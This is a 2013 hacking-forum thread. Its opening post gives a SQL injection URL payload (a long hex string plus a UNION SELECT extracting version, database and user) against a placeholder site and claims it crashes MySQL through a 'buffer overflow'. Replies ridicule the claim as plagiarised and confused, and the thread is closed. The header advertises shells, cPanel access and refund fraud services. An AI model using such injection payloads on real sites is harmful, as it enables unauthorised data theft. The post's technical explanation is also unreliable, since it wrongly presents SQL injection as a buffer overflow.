Login Register






SMTPMart - Buy Inbox SMTP | Leads | Shell | cPanel 100% Bonus on 1st deposit | Instant Refunds
ProxyByte $2/GB | Residential IPv4 - No Logs - 26M+ IPs - All unblocked
REFUNDING.GG | #1 REFUND SERVICE | SAME DAY REFUNDS | WORLDWIDE ORDERS | GET ITEMS 85% OFF
The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average
Thread Closed 


Advanced SQL Injection: Buffer Overflows filter_list
Author
Message
Crypton Offline
Junior Member
Twelve Years of Service
Posts: 8
Threads: 1
Reputation: 0

Points: 0NSP
Advanced SQL Injection: Buffer Overflows 01-22-2013, 11:42 PM #1
Hello friendz...
today, i will show my own technique to fuck mysql databases...

today, i will show u how to create buffer overflows when you are injecting a site, with this technique, we can easily deliver buffer overflows to the site...

example:

we will use "+and+(select 1)=(select 0x414141414141441414141414114141414141414141414141 414141
414141414141….)+union+select+1,2,version(),databas e(),user(),6,7,8,9,10--"

http://site.com/aaaa/agd.php?id=-1+and+(select 1)=(select 0x414141414141441414141414114141414141414141414141 414141
414141414141….)+union+select+1,2,version(),databas e(),user(),6,7,8,9,10--


------------the vulnerability------------

when sending the "select" parameter with overdose of queries, the mysql database will not respond, since we also added some other queries on the parameter-side, and b00m. the mysql server has crashed!


that is it Biggrin =))


The Real Slim Shady Away
Banned
Twelve Years of Service
Posts: 3,165
Threads: 99

Points: 101NSP
RE: Advanced SQL Injection: Buffer Overflows 01-23-2013, 12:02 AM #2
Oh so you are a member of CWH Underground? pretty 1337! Why did you simply excerpt such a small portion of the file this was released under? The entire article is available at http://packetstormsecurity.com/files/105...ypass.html

I dont get why you yourself added the space in databas e() though. The original doesnt have that "error". Was that to stop script kiddies from being able to run this willy nilly, or was it to stop us from finding out you plagiarised this from someone else. Hmmm.


LEGITimacy™ Offline
♥Coding Multi Account Cracker♥
Twelve Years of Service
Posts: 41
Threads: 12
Reputation: 0

Points: 0NSP
RE: Advanced SQL Injection: Buffer Overflows 01-23-2013, 04:44 AM #3
Okay if this is your "own" technique then explain to me exactly what this code is. " 0x414141414141441414141414114141414141414141414141 414141
414141414141 " ? Explain to me what language a Buffer Overflow is written in? And tell me what that specific bit of code does to the stack ? I dont think I will be getting to great of a reply. Dont leech and claim as your own.
[Image: 8Hd3UZQ.png]

My Private Tools:
[*] Private SQL INJECTION SCANNER! [*]

[*] HQ Tutiorals Too! [*]

Website

pratham Offline
Senior Member
Twelve Years of Service
Posts: 369
Threads: 29
Reputation: 0

Points: 12NSP
RE: Advanced SQL Injection: Buffer Overflows 04-24-2013, 08:07 AM #4
(01-23-2013, 04:44 AM)LEGITimacy™ Wrote: Okay if this is your "own" technique then explain to me exactly what this code is. " 0x414141414141441414141414114141414141414141414141 414141
414141414141 " ? Explain to me what language a Buffer Overflow is written in? And tell me what that specific bit of code does to the stack ? I dont think I will be getting to great of a reply. Dont leech and claim as your own.

hahahh.. Biggrin good ques... Biggrin

If he don't know
What is buffer?
what is stack?
how to do push and pop operation in stack?
how to overflow stack?
When it overflow?
What is for format string?
How to access memory address using format string?
What is assembly?
Different instructions in assembly?

Then he is nothing... :nono:

He don't know anything about buffer overflow... Tongue

Website

Linuxephus™ Away
Unix Guerrilla Warfare Specialist™
Eleven Years of Service
Posts: 3,220
Threads: 29

Points: 1NSP
RE: Advanced SQL Injection: Buffer Overflows 04-24-2013, 09:58 PM #5
Reading as how the Author hasn't bothered responding to the charge of plagiarism, Author is found guilty by peers of high ranking from within the Community.
Thread closed on that merit.

Website


Thread Closed 





Users browsing this thread: 1 Guest(s)